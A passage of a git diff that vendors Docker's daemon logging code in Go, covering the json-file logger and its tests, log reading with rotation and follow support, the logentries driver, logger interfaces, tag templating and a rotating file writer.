+	timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp)
+	if err != nil {
+		return err
+	}
+	l.mu.Lock()
+	logline := msg.Line
+	if !msg.Partial {
+		logline = append(msg.Line, '\n')
+	}
+	err = (&jsonlog.JSONLogs{
+		Log:      logline,
+		Stream:   msg.Source,
+		Created:  timestamp,
+		RawAttrs: l.extra,
+	}).MarshalJSONBuf(l.buf)
+	if err != nil {
+		l.mu.Unlock()
+		return err
+	}
+
+	l.buf.WriteByte('\n')
+	_, err = l.writer.Write(l.buf.Bytes())
+	l.buf.Reset()
+	l.mu.Unlock()
+
+	return err
+}
+
+// ValidateLogOpt looks for json specific log options max-file & max-size.
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case "max-file":
+		case "max-size":
+		case "labels":
+		case "env":
+		default:
+			return fmt.Errorf("unknown log opt '%s' for json-file log driver", key)
+		}
+	}
+	return nil
+}
+
+// LogPath returns the location the given json logger logs to.
+func (l *JSONFileLogger) LogPath() string {
+	return l.writer.LogPath()
+}
+
+// Close closes underlying file and signals all readers to stop.
+func (l *JSONFileLogger) Close() error {
+	l.mu.Lock()
+	err := l.writer.Close()
+	for r := range l.readers {
+		r.Close()
+		delete(l.readers, r)
+	}
+	l.mu.Unlock()
+	return err
+}
+
+// Name returns name of this logger.
+func (l *JSONFileLogger) Name() string {
+	return Name
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
new file mode 100644
index 0000000000..b5b818a8ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
@@ -0,0 +1,248 @@
+package jsonfilelog
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"strconv"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/pkg/jsonlog"
+)
+
+func TestJSONFileLogger(t *testing.T) {
+	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	tmp, err := ioutil.TempDir("", "docker-logger-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	filename := filepath.Join(tmp, "container.log")
+	l, err := New(logger.Context{
+		ContainerID: cid,
+		LogPath:     filename,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer l.Close()
+
+	if err := l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"}); err != nil {
+		t.Fatal(err)
+	}
+	if err := l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"}); err != nil {
+		t.Fatal(err)
+	}
+	if err := l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"}); err != nil {
+		t.Fatal(err)
+	}
+	res, err := ioutil.ReadFile(filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expected := `{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line2\n","stream":"src2","time":"0001-01-01T00:00:00Z"}
+{"log":"line3\n","stream":"src3","time":"0001-01-01T00:00:00Z"}
+`
+
+	if string(res) != expected {
+		t.Fatalf("Wrong log content: %q, expected %q", res, expected)
+	}
+}
+
+func BenchmarkJSONFileLogger(b *testing.B) {
+	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	tmp, err := ioutil.TempDir("", "docker-logger-")
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	filename := filepath.Join(tmp, "container.log")
+	l, err := New(logger.Context{
+		ContainerID: cid,
+		LogPath:     filename,
+	})
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer l.Close()
+
+	testLine := "Line that thinks that it is log line from docker\n"
+	msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()}
+	jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON()
+	if err != nil {
+		b.Fatal(err)
+	}
+	b.SetBytes(int64(len(jsonlog)+1) * 30)
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		for j := 0; j < 30; j++ {
+			if err := l.Log(msg); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func TestJSONFileLoggerWithOpts(t *testing.T) {
+	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	tmp, err := ioutil.TempDir("", "docker-logger-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	filename := filepath.Join(tmp, "container.log")
+	config := map[string]string{"max-file": "2", "max-size": "1k"}
+	l, err := New(logger.Context{
+		ContainerID: cid,
+		LogPath:     filename,
+		Config:      config,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer l.Close()
+	for i := 0; i < 20; i++ {
+		if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil {
+			t.Fatal(err)
+		}
+	}
+	res, err := ioutil.ReadFile(filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+	penUlt, err := ioutil.ReadFile(filename + ".1")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedPenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line4\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line5\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line6\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line7\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line8\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line9\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line10\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line11\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line12\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line13\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+`
+	expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+`
+
+	if string(res) != expected {
+		t.Fatalf("Wrong log content: %q, expected %q", res, expected)
+	}
+	if string(penUlt) != expectedPenultimate {
+		t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate)
+	}
+
+}
+
+func TestJSONFileLoggerWithLabelsEnv(t *testing.T) {
+	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	tmp, err := ioutil.TempDir("", "docker-logger-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+	filename := filepath.Join(tmp, "container.log")
+	config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"}
+	l, err := New(logger.Context{
+		ContainerID:     cid,
+		LogPath:         filename,
+		Config:          config,
+		ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"},
+		ContainerEnv:    []string{"environ=production", "debug=false", "port=10001", "ssl=true"},
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer l.Close()
+	if err := l.Log(&logger.Message{Line: []byte("line"), Source: "src1"}); err != nil {
+		t.Fatal(err)
+	}
+	res, err := ioutil.ReadFile(filename)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	var jsonLog jsonlog.JSONLogs
+	if err := json.Unmarshal(res, &jsonLog); err != nil {
+		t.Fatal(err)
+	}
+	extra := make(map[string]string)
+	if err := json.Unmarshal(jsonLog.RawAttrs, &extra); err != nil {
+		t.Fatal(err)
+	}
+	expected := map[string]string{
+		"rack":    "101",
+		"dc":      "lhr",
+		"environ": "production",
+		"debug":   "false",
+		"ssl":     "true",
+	}
+	if !reflect.DeepEqual(extra, expected) {
+		t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected)
+	}
+}
+
+func BenchmarkJSONFileLoggerWithReader(b *testing.B) {
+	b.StopTimer()
+	b.ResetTimer()
+	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	dir, err := ioutil.TempDir("", "json-logger-bench")
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+
+	l, err := New(logger.Context{
+		ContainerID: cid,
+		LogPath:     filepath.Join(dir, "container.log"),
+	})
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer l.Close()
+	msg := &logger.Message{Line: []byte("line"), Source: "src1"}
+	jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON()
+	if err != nil {
+		b.Fatal(err)
+	}
+	b.SetBytes(int64(len(jsonlog)+1) * 30)
+
+	b.StartTimer()
+
+	go func() {
+		for i := 0; i < b.N; i++ {
+			for j := 0; j < 30; j++ {
+				l.Log(msg)
+			}
+		}
+		l.Close()
+	}()
+
+	lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true})
+	watchClose := lw.WatchClose()
+	for {
+		select {
+		case <-lw.Msg:
+		case <-watchClose:
+			return
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
new file mode 100644
index 0000000000..f2f9df1887
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
@@ -0,0 +1,319 @@
+package jsonfilelog
+
+import (
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"time"
+
+	"github.com/fsnotify/fsnotify"
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/pkg/filenotify"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/pkg/tailfile"
+)
+
+const maxJSONDecodeRetry = 20000
+
+func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) {
+	l.Reset()
+	if err := dec.Decode(l); err != nil {
+		return nil, err
+	}
+	msg := &logger.Message{
+		Source:    l.Stream,
+		Timestamp: l.Created,
+		Line:      []byte(l.Log),
+		Attrs:     l.Attrs,
+	}
+	return msg, nil
+}
+
+// ReadLogs implements the logger's LogReader interface for the logs
+// created by this driver.
+func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher {
+	logWatcher := logger.NewLogWatcher()
+
+	go l.readLogs(logWatcher, config)
+	return logWatcher
+}
+
+func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) {
+	defer close(logWatcher.Msg)
+
+	// lock so the read stream doesn't get corrupted due to rotations or other log data written while we read
+	// This will block writes!!!
+	l.mu.Lock()
+
+	pth := l.writer.LogPath()
+	var files []io.ReadSeeker
+	for i := l.writer.MaxFiles(); i > 1; i-- {
+		f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1))
+		if err != nil {
+			if !os.IsNotExist(err) {
+				logWatcher.Err <- err
+				break
+			}
+			continue
+		}
+		defer f.Close()
+
+		files = append(files, f)
+	}
+
+	latestFile, err := os.Open(pth)
+	if err != nil {
+		logWatcher.Err <- err
+		l.mu.Unlock()
+		return
+	}
+	defer latestFile.Close()
+
+	if config.Tail != 0 {
+		tailer := ioutils.MultiReadSeeker(append(files, latestFile)...)
+		tailFile(tailer, logWatcher, config.Tail, config.Since)
+	}
+
+	// close all the rotated files
+	for _, f := range files {
+		if err := f.(io.Closer).Close(); err != nil {
+			logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err)
+		}
+	}
+
+	if !config.Follow {
+		if err := latestFile.Close(); err != nil {
+			logrus.Errorf("Error closing file: %v", err)
+		}
+		l.mu.Unlock()
+		return
+	}
+
+	if config.Tail >= 0 {
+		latestFile.Seek(0, os.SEEK_END)
+	}
+
+	l.readers[logWatcher] = struct{}{}
+	l.mu.Unlock()
+
+	notifyRotate := l.writer.NotifyRotate()
+	followLogs(latestFile, logWatcher, notifyRotate, config.Since)
+
+	l.mu.Lock()
+	delete(l.readers, logWatcher)
+	l.mu.Unlock()
+
+	l.writer.NotifyRotateEvict(notifyRotate)
+}
+
+func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) {
+	var rdr io.Reader
+	rdr = f
+	if tail > 0 {
+		ls, err := tailfile.TailFile(f, tail)
+		if err != nil {
+			logWatcher.Err <- err
+			return
+		}
+		rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n")))
+	}
+	dec := json.NewDecoder(rdr)
+	l := &jsonlog.JSONLog{}
+	for {
+		msg, err := decodeLogLine(dec, l)
+		if err != nil {
+			if err != io.EOF {
+				logWatcher.Err <- err
+			}
+			return
+		}
+		if !since.IsZero() && msg.Timestamp.Before(since) {
+			continue
+		}
+		logWatcher.Msg <- msg
+	}
+}
+
+func watchFile(name string) (filenotify.FileWatcher, error) {
+	fileWatcher, err := filenotify.New()
+	if err != nil {
+		return nil, err
+	}
+
+	if err := fileWatcher.Add(name); err != nil {
+		logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err)
+		fileWatcher.Close()
+		fileWatcher = filenotify.NewPollingWatcher()
+
+		if err := fileWatcher.Add(name); err != nil {
+			fileWatcher.Close()
+			logrus.Debugf("error watching log file for modifications: %v", err)
+			return nil, err
+		}
+	}
+	return fileWatcher, nil
+}
+
+func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) {
+	dec := json.NewDecoder(f)
+	l := &jsonlog.JSONLog{}
+
+	name := f.Name()
+	fileWatcher, err := watchFile(name)
+	if err != nil {
+		logWatcher.Err <- err
+		return
+	}
+	defer func() {
+		f.Close()
+		fileWatcher.Remove(name)
+		fileWatcher.Close()
+	}()
+
+	ctx, cancel := context.WithCancel(context.Background())
+	defer cancel()
+	go func() {
+		select {
+		case <-logWatcher.WatchClose():
+			fileWatcher.Remove(name)
+			cancel()
+		case <-ctx.Done():
+			return
+		}
+	}()
+
+	var retries int
+	handleRotate := func() error {
+		f.Close()
+		fileWatcher.Remove(name)
+
+		// retry when the file doesn't exist
+		for retries := 0; retries <= 5; retries++ {
+			f, err = os.Open(name)
+			if err == nil || !os.IsNotExist(err) {
+				break
+			}
+		}
+		if err != nil {
+			return err
+		}
+		if err := fileWatcher.Add(name); err != nil {
+			return err
+		}
+		dec = json.NewDecoder(f)
+		return nil
+	}
+
+	errRetry := errors.New("retry")
+	errDone := errors.New("done")
+	waitRead := func() error {
+		select {
+		case e := <-fileWatcher.Events():
+			switch e.Op {
+			case fsnotify.Write:
+				dec = json.NewDecoder(f)
+				return nil
+			case fsnotify.Rename, fsnotify.Remove:
+				select {
+				case <-notifyRotate:
+				case <-ctx.Done():
+					return errDone
+				}
+				if err := handleRotate(); err != nil {
+					return err
+				}
+				return nil
+			}
+			return errRetry
+		case err := <-fileWatcher.Errors():
+			logrus.Debug("logger got error watching file: %v", err)
+			// Something happened, let's try and stay alive and create a new watcher
+			if retries <= 5 {
+				fileWatcher.Close()
+				fileWatcher, err = watchFile(name)
+				if err != nil {
+					return err
+				}
+				retries++
+				return errRetry
+			}
+			return err
+		case <-ctx.Done():
+			return errDone
+		}
+	}
+
+	handleDecodeErr := func(err error) error {
+		if err == io.EOF {
+			for err := waitRead(); err != nil; {
+				if err == errRetry {
+					// retry the waitRead
+					continue
+				}
+				return err
+			}
+			return nil
+		}
+		// try again because this shouldn't happen
+		if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry {
+			dec = json.NewDecoder(f)
+			retries++
+			return nil
+		}
+		// io.ErrUnexpectedEOF is returned from json.Decoder when there is
+		// remaining data in the parser's buffer while an io.EOF occurs.
+		// If the json logger writes a partial json log entry to the disk
+		// while at the same time the decoder tries to decode it, the race condition happens.
+		if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry {
+			reader := io.MultiReader(dec.Buffered(), f)
+			dec = json.NewDecoder(reader)
+			retries++
+			return nil
+		}
+		return err
+	}
+
+	// main loop
+	for {
+		msg, err := decodeLogLine(dec, l)
+		if err != nil {
+			if err := handleDecodeErr(err); err != nil {
+				if err == errDone {
+					return
+				}
+				// we got an unrecoverable error, so return
+				logWatcher.Err <- err
+				return
+			}
+			// ready to try again
+			continue
+		}
+
+		retries = 0 // reset retries since we've succeeded
+		if !since.IsZero() && msg.Timestamp.Before(since) {
+			continue
+		}
+		select {
+		case logWatcher.Msg <- msg:
+		case <-ctx.Done():
+			logWatcher.Msg <- msg
+			for {
+				msg, err := decodeLogLine(dec, l)
+				if err != nil {
+					return
+				}
+				if !since.IsZero() && msg.Timestamp.Before(since) {
+					continue
+				}
+				logWatcher.Msg <- msg
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
new file mode 100644
index 0000000000..e794b1ed08
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
@@ -0,0 +1,94 @@
+// Package logentries provides the log driver for forwarding server logs
+// to logentries endpoints.
+package logentries
+
+import (
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/bsphere/le_go"
+	"github.com/docker/docker/daemon/logger"
+)
+
+type logentries struct {
+	tag           string
+	containerID   string
+	containerName string
+	writer        *le_go.Logger
+	extra         map[string]string
+}
+
+const (
+	name  = "logentries"
+	token = "logentries-token"
+)
+
+func init() {
+	if err := logger.RegisterLogDriver(name, New); err != nil {
+		logrus.Fatal(err)
+	}
+	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
+		logrus.Fatal(err)
+	}
+}
+
+// New creates a logentries logger using the configuration passed in on
+// the context. The supported context configuration variable is
+// logentries-token.
+func New(ctx logger.Context) (logger.Logger, error) {
+	logrus.WithField("container", ctx.ContainerID).
+		WithField("token", ctx.Config[token]).
+		Debug("logging driver logentries configured")
+
+	log, err := le_go.Connect(ctx.Config[token])
+	if err != nil {
+		return nil, err
+	}
+	return &logentries{
+		containerID:   ctx.ContainerID,
+		containerName: ctx.ContainerName,
+		writer:        log,
+	}, nil
+}
+
+func (f *logentries) Log(msg *logger.Message) error {
+	data := map[string]string{
+		"container_id":   f.containerID,
+		"container_name": f.containerName,
+		"source":         msg.Source,
+		"log":            string(msg.Line),
+	}
+	for k, v := range f.extra {
+		data[k] = v
+	}
+	f.writer.Println(f.tag, msg.Timestamp, data)
+	return nil
+}
+
+func (f *logentries) Close() error {
+	return f.writer.Close()
+}
+
+func (f *logentries) Name() string {
+	return name
+}
+
+// ValidateLogOpt looks for logentries specific log option logentries-address.
+func ValidateLogOpt(cfg map[string]string) error {
+	for key := range cfg {
+		switch key {
+		case "env":
+		case "labels":
+		case "tag":
+		case key:
+		default:
+			return fmt.Errorf("unknown log opt '%s' for logentries log driver", key)
+		}
+	}
+
+	if cfg[token] == "" {
+		return fmt.Errorf("Missing logentries token")
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go
new file mode 100644
index 0000000000..d091997358
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/logger.go
@@ -0,0 +1,134 @@
+// Package logger defines interfaces that logger drivers implement to
+// log messages.
+//
+// The other half of a logger driver is the implementation of the
+// factory, which holds the contextual instance information that
+// allows multiple loggers of the same type to perform different
+// actions, such as logging to different locations.
+package logger
+
+import (
+	"errors"
+	"sort"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/jsonlog"
+)
+
+// ErrReadLogsNotSupported is returned when the logger does not support reading logs.
+var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading")
+
+const (
+	// TimeFormat is the time format used for timestamps sent to log readers.
+	TimeFormat           = jsonlog.RFC3339NanoFixed
+	logWatcherBufferSize = 4096
+)
+
+// Message is datastructure that represents piece of output produced by some
+// container.  The Line member is a slice of an array whose contents can be
+// changed after a log driver's Log() method returns.
+type Message struct {
+	Line      []byte
+	Source    string
+	Timestamp time.Time
+	Attrs     LogAttributes
+	Partial   bool
+}
+
+// CopyMessage creates a copy of the passed-in Message which will remain
+// unchanged if the original is changed.  Log drivers which buffer Messages
+// rather than dispatching them during their Log() method should use this
+// function to obtain a Message whose Line member's contents won't change.
+func CopyMessage(msg *Message) *Message {
+	m := new(Message)
+	m.Line = make([]byte, len(msg.Line))
+	copy(m.Line, msg.Line)
+	m.Source = msg.Source
+	m.Timestamp = msg.Timestamp
+	m.Partial = msg.Partial
+	m.Attrs = make(LogAttributes)
+	for k, v := range msg.Attrs {
+		m.Attrs[k] = v
+	}
+	return m
+}
+
+// LogAttributes is used to hold the extra attributes available in the log message
+// Primarily used for converting the map type to string and sorting.
+type LogAttributes map[string]string
+type byKey []string
+
+func (s byKey) Len() int { return len(s) }
+func (s byKey) Less(i, j int) bool {
+	keyI := strings.Split(s[i], "=")
+	keyJ := strings.Split(s[j], "=")
+	return keyI[0] < keyJ[0]
+}
+func (s byKey) Swap(i, j int) {
+	s[i], s[j] = s[j], s[i]
+}
+
+func (a LogAttributes) String() string {
+	var ss byKey
+	for k, v := range a {
+		ss = append(ss, k+"="+v)
+	}
+	sort.Sort(ss)
+	return strings.Join(ss, ",")
+}
+
+// Logger is the interface for docker logging drivers.
+type Logger interface {
+	Log(*Message) error
+	Name() string
+	Close() error
+}
+
+// ReadConfig is the configuration passed into ReadLogs.
+type ReadConfig struct {
+	Since  time.Time
+	Tail   int
+	Follow bool
+}
+
+// LogReader is the interface for reading log messages for loggers that support reading.
+type LogReader interface {
+	// Read logs from underlying logging backend
+	ReadLogs(ReadConfig) *LogWatcher
+}
+
+// LogWatcher is used when consuming logs read from the LogReader interface.
+type LogWatcher struct {
+	// For sending log messages to a reader.
+	Msg chan *Message
+	// For sending error messages that occur while while reading logs.
+	Err           chan error
+	closeOnce     sync.Once
+	closeNotifier chan struct{}
+}
+
+// NewLogWatcher returns a new LogWatcher.
+func NewLogWatcher() *LogWatcher {
+	return &LogWatcher{
+		Msg:           make(chan *Message, logWatcherBufferSize),
+		Err:           make(chan error, 1),
+		closeNotifier: make(chan struct{}),
+	}
+}
+
+// Close notifies the underlying log reader to stop.
+func (w *LogWatcher) Close() {
+	// only close if not already closed
+	w.closeOnce.Do(func() {
+		close(w.closeNotifier)
+	})
+}
+
+// WatchClose returns a channel receiver that receives notification
+// when the watcher has been closed. This should only be called from
+// one goroutine.
+func (w *LogWatcher) WatchClose() <-chan struct{} {
+	return w.closeNotifier
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go
new file mode 100644
index 0000000000..16e1514d2d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go
@@ -0,0 +1,26 @@
+package logger
+
+import (
+	"reflect"
+	"testing"
+	"time"
+)
+
+func TestCopyMessage(t *testing.T) {
+	msg := &Message{
+		Line:      []byte("test line."),
+		Source:    "stdout",
+		Timestamp: time.Now(),
+		Attrs: LogAttributes{
+			"key1": "val1",
+			"key2": "val2",
+			"key3": "val3",
+		},
+		Partial: true,
+	}
+
+	m := CopyMessage(msg)
+	if !reflect.DeepEqual(m, msg) {
+		t.Fatalf("CopyMessage failed to copy message")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
new file mode 100644
index 0000000000..4752679c72
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
@@ -0,0 +1,31 @@
+package loggerutils
+
+import (
+	"bytes"
+
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/utils/templates"
+)
+
+// DefaultTemplate defines the defaults template logger should use.
+const DefaultTemplate = "{{.ID}}"
+
+// ParseLogTag generates a context aware tag for consistency across different
+// log drivers based on the context of the running container.
+func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) {
+	tagTemplate := ctx.Config["tag"]
+	if tagTemplate == "" {
+		tagTemplate = defaultTemplate
+	}
+
+	tmpl, err := templates.NewParse("log-tag", tagTemplate)
+	if err != nil {
+		return "", err
+	}
+	buf := new(bytes.Buffer)
+	if err := tmpl.Execute(buf, &ctx); err != nil {
+		return "", err
+	}
+
+	return buf.String(), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
new file mode 100644
index 0000000000..e2aa4358aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go
@@ -0,0 +1,47 @@
+package loggerutils
+
+import (
+	"testing"
+
+	"github.com/docker/docker/daemon/logger"
+)
+
+func TestParseLogTagDefaultTag(t *testing.T) {
+	ctx := buildContext(map[string]string{})
+	tag, e := ParseLogTag(ctx, "{{.ID}}")
+	assertTag(t, e, tag, ctx.ID())
+}
+
+func TestParseLogTag(t *testing.T) {
+	ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"})
+	tag, e := ParseLogTag(ctx, "{{.ID}}")
+	assertTag(t, e, tag, "test-image/test-container/container-ab")
+}
+
+func TestParseLogTagEmptyTag(t *testing.T) {
+	ctx := buildContext(map[string]string{})
+	tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}")
+	assertTag(t, e, tag, "test-dockerd/container-ab")
+}
+
+// Helpers
+
+func buildContext(cfg map[string]string) logger.Context {
+	return logger.Context{
+		ContainerID:        "container-abcdefghijklmnopqrstuvwxyz01234567890",
+		ContainerName:      "/test-container",
+		ContainerImageID:   "image-abcdefghijklmnopqrstuvwxyz01234567890",
+		ContainerImageName: "test-image",
+		Config:             cfg,
+		DaemonName:         "test-dockerd",
+	}
+}
+
+func assertTag(t *testing.T, e error, tag string, expected string) {
+	if e != nil {
+		t.Fatalf("Error generating tag: %q", e)
+	}
+	if tag != expected {
+		t.Fatalf("Wrong tag: %q, should be %q", tag, expected)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
new file mode 100644
index 0000000000..99e0964aea
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go
@@ -0,0 +1,124 @@
+package loggerutils
+
+import (
+	"os"
+	"strconv"
+	"sync"
+
+	"github.com/docker/docker/pkg/pubsub"
+)
+
+// RotateFileWriter is Logger implementation for default Docker logging.
+type RotateFileWriter struct {
+	f            *os.File // store for closing
+	mu           sync.Mutex
+	capacity     int64 //maximum size of each file
+	currentSize  int64 // current size of the latest file
+	maxFiles     int   //maximum number of files
+	notifyRotate *pubsub.Publisher
+}
+
+//NewRotateFileWriter creates new RotateFileWriter
+func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) {
+	log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640)
+	if err != nil {
+		return nil, err
+	}
+
+	size, err := log.Seek(0, os.SEEK_END)
+	if err != nil {
+		return nil, err
+	}
+
+	return &RotateFileWriter{
+		f:            log,
+		capacity:     capacity,
+		currentSize:  size,
+		maxFiles:     maxFiles,
+		notifyRotate: pubsub.NewPublisher(0, 1),
+	}, nil
+}
+
+//WriteLog write log message to File
+func (w *RotateFileWriter) Write(message []byte) (int, error) {
+	w.mu.Lock()
+	if err := w.checkCapacityAndRotate(); err != nil {
+		w.mu.Unlock()
+		return -1, err
+	}
+
+	n, err := w.f.Write(message)
+	if err == nil {
+		w.currentSize += int64(n)
+	}
+	w.mu.Unlock()
+	return n, err
+}
+
+func (w *RotateFileWriter) checkCapacityAndRotate() error {
+	if w.capacity == -1 {
+		return nil
+	}
+
+	if w.currentSize >= w.capacity {
+		name := w.f.Name()
+		if err := w.f.Close(); err != nil {
+			return err
+		}
+		if err := rotate(name, w.maxFiles); err != nil {
+			return err
+		}
+		file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400)
+		if err != nil {
+			return err
+		}
+		w.f = file
+		w.currentSize = 0
+		w.notifyRotate.Publish(struct{}{})
+	}
+
+	return nil
+}
+
+func rotate(name string, maxFiles int) error {
+	if maxFiles < 2 {
+		return nil
+	}
+	for i := maxFiles - 1; i > 1; i-- {
+		toPath := name + "." + strconv.Itoa(i)
+		fromPath := name + "." + strconv.Itoa(i-1)
+		if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) {
+			return err
+		}
+	}
+
+	if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	return nil
+}
+
+// LogPath returns the location the given writer logs to.
+func (w *RotateFileWriter) LogPath() string {
+	return w.f.Name()
+}
+
+// MaxFiles return maximum number of files
